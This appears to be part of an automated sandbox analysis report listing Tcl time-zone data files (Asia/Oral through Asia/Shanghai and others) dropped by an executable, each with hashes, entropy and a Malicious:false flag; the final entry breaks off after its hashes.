                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Oral) {.. {-9223372036854775808 12324 0 LMT}.. {-1441164324 10800 0 +03}.. {-1247540400 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {701816400 14400 0 +04}.. {701820000 18000 1 +04}.. {717544800 14400 0 +04}.. {733269600 18000 1 +04}.. {74899440
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.958543249401788
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/2WFKeHKLNM0WFKELt:SlSWB9vsM3y1LePHAIgKELtAN/2wKTNg
                                                                                                                                                                                                                              MD5:EBF01E229CC41EB8B27650A3D668EDC1
                                                                                                                                                                                                                              SHA1:33E1B252C1B45EAE326FCF8CC7C80C78A46F7E8D
                                                                                                                                                                                                                              SHA-256:DCEE88876D00396918F43DECA421B6C9B02F84B5866A2CE16E641B814B390A9F
                                                                                                                                                                                                                              SHA-512:80840600F37A256B8FD9933760FBAE7C13DE1E24EFD970E47BE8DEC731DFABF6D6FB76999BEEC775FF8C8B8719E94788ED7EEB04376A34C827ACB443F720F7E3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Asia/Phnom_Penh) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                                                                              Entropy (8bit):4.492596995768464
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKT5PDm2OHUeoH99xV/1kc5k/MVSSFFCLkvScH+dMVSSFL1CnF4mMz:MB862L5bmdHFCRV/6c5kMxGLkHHaMxFn
                                                                                                                                                                                                                              MD5:9ADB1A9E41A143A06116E24EA0A53D90
                                                                                                                                                                                                                              SHA1:6E50B549E1A705C0090BD5EDE26F7DED78CDF71A
                                                                                                                                                                                                                              SHA-256:AC8370AEDF5FE3FE1E80710CE117DEE23815BE377D418E4B4F3259A1930E8DBF
                                                                                                                                                                                                                              SHA-512:92790B20B960AC518AB2E18F902C6E0BA887F268909F5571CAC1068F5E719CCF6943AE6902DA1B683E170658B5E7BE06C6A187C1C0A652DD052D5BD0B2A7B84D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Pontianak) {.. {-9223372036854775808 26240 0 LMT}.. {-1946186240 26240 0 PMT}.. {-1172906240 27000 0 +0730}.. {-881220600 32400 0 +09}.. {-766054800 27000 0 +0730}.. {-683883000 28800 0 +08}.. {-620812800 27000 0 +0730}.. {-189415800 28800 0 WITA}.. {567964800 25200 0 WIB}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):273
                                                                                                                                                                                                                              Entropy (8bit):4.709411633376997
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wK8cE4SDm2OHnNoH9Aw8vmVuT0vjLtcjviov:MB8620cExmdHnNCGv2Ezv
                                                                                                                                                                                                                              MD5:727BBC1A1662B500F616F544A484F213
                                                                                                                                                                                                                              SHA1:93C1D902D9D4AA4197C7D16C61FB784AC01D0DE5
                                                                                                                                                                                                                              SHA-256:29BA17F756F5C0BBA30FEBF44E620504D04921C832BD1CB56E1B60EF288B57DF
                                                                                                                                                                                                                              SHA-512:C3C91E2F180109FF33E6491722F679A1B8DCE8CD31DE006D7FF2CBE270C008E927507C953641D28EE77D139BBEA54DEA1B7DBD6C30B208DDAB1B58756C32AC02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Pyongyang) {.. {-9223372036854775808 30180 0 LMT}.. {-1948782180 30600 0 KST}.. {-1830414600 32400 0 JST}.. {-768646800 32400 0 KST}.. {1439564400 30600 0 KST}.. {1525446000 32400 0 KST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.851251407399968
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKK3ovXMXGm2OHPFV4YoHsQKb3VvVsRYovFFF3FRVGsWr:SlSWB9eg/2wKK3yXDm2OHoYoHxcvSNFS
                                                                                                                                                                                                                              MD5:CBA9635133F88AD3B27E23B95430C27C
                                                                                                                                                                                                                              SHA1:5E41232EC03BBC71B522F58CB2D05E6BFFFF1A75
                                                                                                                                                                                                                              SHA-256:18CCA69F933795CE3F7DB31506EFC063E6CE1DFDCAB32AA387C398456D7F7E1F
                                                                                                                                                                                                                              SHA-512:D7C43F1F9ADA54C914ADB3CB2C9063EB7044089CFC7755ACFD08828CDEBA3C116AE2BE916ABE5D561E63699B921BC52636DD0BBC2C4304F813616D320D7DDAAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qatar) {.. {-9223372036854775808 12368 0 LMT}.. {-1577935568 14400 0 +04}.. {76190400 10800 0 +03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1668
                                                                                                                                                                                                                              Entropy (8bit):3.7299735983334195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5DwvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQA:BMaBNKs6b03zB0WJEuDa7sFZiKWaN6TE
                                                                                                                                                                                                                              MD5:F5DBE4E72FA5AB0019CC98C8E21EC86E
                                                                                                                                                                                                                              SHA1:27ECB901AA07C18EA7F38235E8EFE0B1635FEFBC
                                                                                                                                                                                                                              SHA-256:4191629B874C988291E8FD13E675A3ED685D677F6541313975FC4610E47F1DCD
                                                                                                                                                                                                                              SHA-512:D5EFD4EFFFFE2E41909AEB7B67BD1FA6FAF4B8E9AC645518D5B33BD1B3C5084F59D47D4ED052E0D4B9F9989BDDBA3AECB3D1E67F5237914D24C01F9C95242396
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qostanay) {.. {-9223372036854775808 15268 0 LMT}.. {-1441167268 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {7489
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1670
                                                                                                                                                                                                                              Entropy (8bit):3.734572151642808
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5NvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWgvNSvTqvIQvyovklvqQX0:TaBNKs6b03zB0WJEuDa7sFZiKWcN6Tir
                                                                                                                                                                                                                              MD5:026EC6E479EC006C4398288362254680
                                                                                                                                                                                                                              SHA1:24AD03DD21DA394B3423D27211955BFD694F8E73
                                                                                                                                                                                                                              SHA-256:CD6B067AA3EF6935B4E89CA36E6A03FCB97F1E0EE61A7B5D46C06BF4DE140774
                                                                                                                                                                                                                              SHA-512:023AC55E118F13A31CE996C7BA155C90D47DEB6C223EEB3C0EE7B702871FF0CCA13CDF61D65FDDABE41B888CD7A74274AA5730059CC5688F8ED4DDBF8FE4ECA4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qyzylorda) {.. {-9223372036854775808 15712 0 LMT}.. {-1441167712 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {701812800 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {764
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):174
                                                                                                                                                                                                                              Entropy (8bit):4.812955128020714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8nv3vXHAIgNnDA6RL/2WFK02KQMFfh4WFKsyn:SlSWB9vsM3yHvPHAIg15N/2wK0GEJ4wy
                                                                                                                                                                                                                              MD5:BD3F294F1EDDD21467E980C9F5A0E7DE
                                                                                                                                                                                                                              SHA1:11A3FC3E4489C18BDF9BFFB4C44615559D9DD99D
                                                                                                                                                                                                                              SHA-256:E4D2C38D8E7377A528291A88129CDAC40CA4D40A5F1CD8ADB98228527556906E
                                                                                                                                                                                                                              SHA-512:FA5FD600627793EABB83C1066BE246A47BCCE1FC57830596B9C0CDE8901B949AF178ABDE876C3B73CC3751312E8A4C03C390888B0B5A9669F511344143F83073
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Yangon)]} {.. LoadTimeZoneFile Asia/Yangon..}..set TZData(:Asia/Rangoon) $TZData(:Asia/Yangon)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):148
                                                                                                                                                                                                                              Entropy (8bit):4.973311159904374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFK814PMXGm2OHFukeoHqUi9VssWYcv:SlSWB9eg/2wK81GDm2OHF7eoHvi9V1Wr
                                                                                                                                                                                                                              MD5:AD3236CFF141732831732357AB181EE3
                                                                                                                                                                                                                              SHA1:EAF51A63898A2048EA5FBE9BA4C001EEE37FFDB2
                                                                                                                                                                                                                              SHA-256:411E31D09FFA48E44169C42661AE2F7FC142460BCAA216837D8C4740983CA7BD
                                                                                                                                                                                                                              SHA-512:6CA2D89C02568580786BE98A863453ADCF4D21CAC52E5B44C4F7A05E76D29AEB3E28E353D6FB758BB553DBC8F35389462B388F61E94C68F5DB50A3E8C429336D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Riyadh) {.. {-9223372036854775808 11212 0 LMT}.. {-719636812 10800 0 +03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.946090704619887
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8I65eV5XHAIgN2h6560ARL/2WFKwJ6h4WFK365ey:SlSWB9vsM3yJAVJHAIgA4k0AN/2wKl4i
                                                                                                                                                                                                                              MD5:0766480A295525EE5D65F1ED32094858
                                                                                                                                                                                                                              SHA1:7A2D68E1009DDD809A4A700931456C617DCD343A
                                                                                                                                                                                                                              SHA-256:C695981A0DF691C3F4509999FBC52858ADC75024CCCBDEFBE1094FED17E809E4
                                                                                                                                                                                                                              SHA-512:A21536FB61A64E953E8D6414FF0AEF1BC7E68A33C5DCF7090517A91FC449B96A93A4FBDF2C00682540D1193FDB29603349F5BDB455FD90045FDBCA61247A9860
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ho_Chi_Minh)]} {.. LoadTimeZoneFile Asia/Ho_Chi_Minh..}..set TZData(:Asia/Saigon) $TZData(:Asia/Ho_Chi_Minh)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2117
                                                                                                                                                                                                                              Entropy (8bit):3.7276904131666577
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5q+3Vv+0j6lua2Gg/3gO8UoflcXRDhUBAc+:YxIa2GOT8tiXBC6c+
                                                                                                                                                                                                                              MD5:295D51B8FBBE890C97637687B8F32322
                                                                                                                                                                                                                              SHA1:7BB72B0EC783898DDF625D275E3BBB964D1693FB
                                                                                                                                                                                                                              SHA-256:D7D0EA5CEF908442AB0D777A4B097BED18540CD5280FF63F33DD989E27E72908
                                                                                                                                                                                                                              SHA-512:9B3E3BA01EAE38A00B0EE8A8FB17191CB4ED2EE9E46AE06403BA8C1193804764C86599840DC03E0C6A631456E1BE2BC560BDF6CF0450068EF78A6E494041326C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Sakhalin) {.. {-9223372036854775808 34248 0 LMT}.. {-2031039048 32400 0 +09}.. {-768560400 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {76469
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):879
                                                                                                                                                                                                                              Entropy (8bit):3.9460497720710506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5t8eZd7QvalvNhQQvmRKqvzQfv7PQIovWxrvEGvDWdDvs5v/RlovKT10Sv6r:5MvalvNhQQvmRKqv0fvzQIovWdvEGvDO
                                                                                                                                                                                                                              MD5:10A758996B0DF756E520541BEA9B7D75
                                                                                                                                                                                                                              SHA1:137E5FD4E00CFA4B3939EF11868862B7F93D87CD
                                                                                                                                                                                                                              SHA-256:35E4B905723891281D9A6A0A1FD3760A3A48136E1419C686BE31ACE83BF7AA9D
                                                                                                                                                                                                                              SHA-512:7E32661731EAB2ED8C387533ACCB4853F5B6225BAC11E93247E7B06D7AA856E6A665F63718BFE395CFD00F80A4C16789D7097FFA8DAD88B1D707BF9C155C1D4C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Samarkand) {.. {-9223372036854775808 16073 0 LMT}.. {-1441168073 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {694206000 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):985
                                                                                                                                                                                                                              Entropy (8bit):4.121802167517286
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5AemgvHzF+zg2c+z3NGmJhIUfqII8yHg/zoD:5F/nfWUBISHg/G
                                                                                                                                                                                                                              MD5:A1DE6975DEA70D7241B5B3C43E1EA3AA
                                                                                                                                                                                                                              SHA1:35EE563A2BCA77C761F7E878997763EA8D258040
                                                                                                                                                                                                                              SHA-256:C4F82C94650572FE4D03BC1FE54CED8F4BF55DFBEE855D52DE3EA6378240AF93
                                                                                                                                                                                                                              SHA-512:1639B0609115DBEA6A381986A732A5CA1523952AEF84843B4D714D5B2FF40B16C4166D8D60D31D4FC2C2BA34DED1F6DB39474336195603562265BDBF71687696
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Seoul) {.. {-9223372036854775808 30472 0 LMT}.. {-1948782472 30600 0 KST}.. {-1830414600 32400 0 JST}.. {-767350800 32400 0 KST}.. {-681210000 36000 1 KDT}.. {-672228000 32400 0 KST}.. {-654771600 36000 1 KDT}.. {-640864800 32400 0 KST}.. {-623408400 36000 1 KDT}.. {-609415200 32400 0 KST}.. {-588848400 36000 1 KDT}.. {-577965600 32400 0 KST}.. {-498128400 30600 0 KST}.. {-462702600 34200 1 KDT}.. {-451733400 30600 0 KST}.. {-429784200 34200 1 KDT}.. {-418296600 30600 0 KST}.. {-399544200 34200 1 KDT}.. {-387451800 30600 0 KST}.. {-368094600 34200 1 KDT}.. {-356002200 30600 0 KST}.. {-336645000 34200 1 KDT}.. {-324552600 30600 0 KST}.. {-305195400 34200 1 KDT}.. {-293103000 30600 0 KST}.. {-264933000 32400 0 KST}.. {547578000 36000 1 KDT}.. {560883600 32400 0 KST}.. {579027600 36000 1 KDT}.. {592333200 32400 0 KST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):981
                                                                                                                                                                                                                              Entropy (8bit):4.16042656890735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Te3vvZJzHjwH6kHp7FH32AzHjZBHNHlQHuHxmHUjH6zHj2HBHeC:5ovZZO7lLpT24
                                                                                                                                                                                                                              MD5:A266AA43A84FD5E4890BC77AA4E240D0
                                                                                                                                                                                                                              SHA1:CD88C5D451CD7D3F50C9B36FDD47C84D20377441
                                                                                                                                                                                                                              SHA-256:3AABB42D9EFE95D906B7F34640E7815919A1A20979EBB6EC1527FCAA3B09B22A
                                                                                                                                                                                                                              SHA-512:13AE48F58C9AF24002F0FE4F28BF96B10EE0ED293E0DE9D29BCEBAAE102B2EA818F42CA4069544A254C95444A48604EC57E6AB2BEBDA4B5E72C82B49E61AD0A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Shanghai) {.. {-9223372036854775808 29143 0 LMT}.. {-2177481943 28800 0 CST}.. {-1600675200 32400 1 CDT}.. {-1585904400 28800 0 CST}.. {-933667200 32400 1 CDT}.. {-922093200 28800 0 CST}.. {-908870400 32400 1 CDT}.. {-888829200 28800 0 CST}.. {-881049600 32400 1 CDT}.. {-767869200 28800 0 CST}.. {-745833600 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716889600 32400 1 CDT}.. {-699613200 28800 0 CST}.. {-683884800 32400 1 CDT}.. {-670669200 28800 0 CST}.. {-652348800 32400 1 CDT}.. {-650016000 28800 0 CST}.. {515527200 32400 1 CDT}.. {527014800 28800 0 CST}.. {545162400 32400 1 CDT}.. {558464400 28800 0 CST}.. {577216800 32400 1 CDT}.. {589914000 28800 0 CST}.. {608666400 32400 1 CDT}.. {621968400 28800 0 CST}.. {640116000 32400 1 CDT}.. {653418000 28800 0 CST}.. {671565600 32400 1 CDT}.. {684867600 28800 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):372
                                                                                                                                                                                                                              Entropy (8bit):4.436676898144829
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKfbSDm2OHxdoHvm5vWOb/MVSYyF/3MesF5XJSx0dMVSSFF8kvScHS:MB862nbGmdHDCvsvDTMsF/CFDMx/HHbe
                                                                                                                                                                                                                              MD5:C3D13D921E4C6E475910E5080B761C32
                                                                                                                                                                                                                              SHA1:8C5AE73C4098D03908E5D567FD7C4D827601D718
                                                                                                                                                                                                                              SHA-256:05C76B58A4E356FD358E24FBC71FAE98DCB18C441C8D8CBB13A18D4F6E406062
                                                                                                                                                                                                                              SHA-512:3A620597469D31577ECAAA098C95C244F0C288ABACE9E8964D8641154C1893967EFBD7211A41751D0D4CC1B0B9A2286F11738EFB7D01F110A4826BBE1844A2EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Singapore) {.. {-9223372036854775808 24925 0 LMT}.. {-2177477725 24925 0 SMT}.. {-2038200925 25200 0 +07}.. {-1167634800 26400 1 +0720}.. {-1073028000 26400 0 +0720}.. {-894180000 27000 0 +0730}.. {-879665400 32400 0 +09}.. {-767005200 27000 0 +0730}.. {378664200 28800 0 +08}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2064
                                                                                                                                                                                                                              Entropy (8bit):3.7913177223006698
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5HJeidmbv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKxwy:5HSv+0j6lua2Gg/3gO8UoOZU2Wc/pKf
                                                                                                                                                                                                                              MD5:B4FA38E884A85F6BD47C8BB02BB0500C
                                                                                                                                                                                                                              SHA1:1DD135B79CC0D81C048D7B2C6BE0CF71171DD19E
                                                                                                                                                                                                                              SHA-256:705D6D8360C2DCD51E909E39E1910FE876145220D151031612DA36B247207395
                                                                                                                                                                                                                              SHA-512:2D32AAAF1BCC865B5F2810BFE0FB82BE98140BB5F2ECA1DA7FD148A3074DA127B81242F17B8BA9C9E259B61CBB123FD1513CCE6A85C8D7679ADFC0D689B552BB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Srednekolymsk) {.. {-9223372036854775808 36892 0 LMT}.. {-1441188892 36000 0 +10}.. {-1247565600 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1344
                                                                                                                                                                                                                              Entropy (8bit):4.062084847879695
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5X2eIvZPzGzHjZBHNHlQHKn3HnHNd9HiHkHBHaHLHMtyH9Qm+zHFOzHZ32HZvHiR:5Xi1ypBvt1mwO3Kq46T
                                                                                                                                                                                                                              MD5:AECA800C8F2A679D0B19E5BB90AFD858
                                                                                                                                                                                                                              SHA1:2C7DCEB709F9A4312C511971FE1E6A9DC1FBD0E8
